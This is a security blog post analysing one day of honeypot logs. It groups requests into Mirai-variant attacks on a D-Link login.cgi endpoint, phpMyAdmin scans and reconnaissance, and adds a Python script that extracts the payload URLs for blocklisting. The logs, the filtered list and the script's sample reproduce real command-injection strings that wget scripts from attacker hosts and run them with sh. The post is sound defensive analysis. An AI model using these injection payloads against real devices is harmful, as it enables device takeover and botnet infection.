S-Owl

S(ecurity)Owl

Honeypot log analysis (2018/08/29)

This is a quick analysis of the WOWhoneypot logs for 2018/08/29 (day 85 of operation).
Today's total access count is 54. The full access log is below.

31 2018-08-29 GET /
5 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
1 2018-08-29 GET /.well-known/security.txt
1 2018-08-29 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-29 GET /sitemap.xml
1 2018-08-29 GET /robots.txt
1 2018-08-29 GET /pma/scripts/setup.php
1 2018-08-29 GET /phpMyAdmin/scripts/setup.php
1 2018-08-29 GET /phpmyadmin/scripts/setup.php
1 2018-08-29 GET /MyAdmin/scripts/setup.php
1 2018-08-29 GET /myadmin/scripts/setup.php
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.33[.]171/bin%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ken.sh%20-O%20-%3E%20/tmp/ken.sh;sh%20/tmp/ken.sh%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251[.]119/t.php%27$
1 2018-08-29 GET hxxp://112.35.53.83:10083/index.php
1 2018-08-29 GET /favicon.ico 


Access counts with the phpMyAdmin-related requests (5) and requests for / excluded:

5 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.33[.]171/bin%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ken.sh%20-O%20-%3E%20/tmp/ken.sh;sh%20/tmp/ken.sh%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251[.]119/t.php%27$
1 2018-08-29 GET hxxp://112.35.53.83:10083/index.php
1 2018-08-29 GET /.well-known/security.txt
1 2018-08-29 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-29 GET /sitemap.xml
1 2018-08-29 GET /robots.txt
1 2018-08-29 GET /favicon.ico

The breakdown of User-Agents for the Mirai variants attacking the D-Link vulnerability is as follows.

8 User-Agent: Hakai/2.0
2 User-Agent: Shinka/1.0
1 User-Agent: LMAO/2.0
1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

The rest are ZmEu scans against phpMyAdmin and probing of the site's structure.


Today's hunting log is below. All entries come from the Mirai variants.

5 2018-08-29 wget hxxp://77.87.77[.]250/izuku.sh
2 2018-08-29 wget hxxp://209.141.33[.]86/d
1 2018-08-29 wget hxxp://80.211.112[.]150/k
1 2018-08-29 wget hxxp://176.32.33[.]171/bin
1 2018-08-29 wget hxxp://148.72.176[.]78/ngynx
1 2018-08-29 wget hxxp://148.72.176[.]78/ken.sh
1 2018-08-29 wget hxxp://128.199.251[.]119/t.php 
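The hunting log above is derived from the access log by URL-decoding the `login.cgi?cli=` requests and pulling the `wget` target out of the injected command string. The script below, an added example that is not part of this post or of WOWhoneypot, reproduces that step and the post's grouping (D-Link cli injection, phpMyAdmin setup.php scans, requests for /, other reconnaissance). The bucket labels are my own choice, and the sample input is a few lines copied from the log above with the defanged `hxxp://` and `[.]` notation kept so nothing in it resolves.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: a handful of lines in the "count date method path" shape
# of the WOWhoneypot summary above (copied from this post; URLs stay defanged,
# so nothing here resolves). Any log in that shape can be fed in instead.
SAMPLE_LOG = """\
31 2018-08-29 GET /
5 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
1 2018-08-29 GET /phpMyAdmin/scripts/setup.php
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251[.]119/t.php%27$
1 2018-08-29 GET /robots.txt
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s*$")
# A wget target ends at whitespace, a command separator, or the closing quote
# that the injected "cli" value uses to terminate the string.
WGET_RE = re.compile(r"""wget\s+([^\s;'"]+)""")


def parse_line(line):
    """Split one summary line into its fields and add the URL-decoded path."""
    m = LINE_RE.match(line)
    if not m:
        return None
    count, date, method, path = m.groups()
    return {"count": int(count), "date": date, "method": method,
            "path": path, "decoded": unquote(path)}


def classify(decoded_path):
    """Bucket a decoded path the way the post groups them (labels are my own)."""
    if decoded_path.startswith("/login.cgi?cli=") and ";" in decoded_path:
        return "dlink_cli_injection"   # shell commands chained into the cli parameter
    if decoded_path.endswith("/scripts/setup.php"):
        return "phpmyadmin_scan"       # ZmEu-style setup.php probing
    if decoded_path == "/":
        return "root"
    return "recon"                     # robots.txt, sitemap.xml, etc.


def summarize(log_text):
    """Access counts per bucket, weighted by the leading count column."""
    totals = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            totals[classify(rec["decoded"])] += rec["count"]
    return totals


def hunting_log(log_text):
    """Rebuild the 'hunting log': wget targets pulled out of the injected commands."""
    urls = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or classify(rec["decoded"]) != "dlink_cli_injection":
            continue
        for url in WGET_RE.findall(rec["decoded"]):
            urls[(rec["date"], url)] += rec["count"]
    return urls


if __name__ == "__main__":
    print(dict(summarize(SAMPLE_LOG)))
    for (date, url), n in hunting_log(SAMPLE_LOG).most_common():
        print(f"{n} {date} wget {url}")
```

Running it on the sample prints the per-bucket totals and then the same `count date wget URL` lines as the hunting log above; the download URLs it extracts are the values worth adding to a blocklist or matching against proxy and DNS logs, since a real device hit by this request would fetch them.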


That is all for today.